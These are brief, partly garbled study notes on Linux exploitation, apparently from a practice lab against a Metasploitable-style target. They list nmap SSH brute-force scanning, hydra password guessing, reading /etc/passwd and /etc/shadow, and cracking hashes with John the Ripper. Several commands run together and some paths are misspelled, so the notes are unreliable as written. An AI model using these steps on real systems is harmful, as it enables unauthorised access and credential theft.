Linux Exploitation
nmap 2.0.0.22 target 1(metasploit)nmap 2.0.0.22 -p 22 --script ssh-brutessh [email protected]
whoami
id if uid=1001 - secondory regular user so 1000 is regular user
cat /etc/password - you can find the other usersHorizontal escalation
hydra -l marlinspike -P /usr/share/wordlists/john/lst 2.0.0.22 ssh -e nsr -t 4cat /etc/shadow - contails passowrd hashesnano hash.txt
john hash.txt
# for the already cracked hashes
john --show hash.txtApplication Vulnerabilities
For Kernel Vulnerabilities
Automation Tools for Enumeration
Last updated


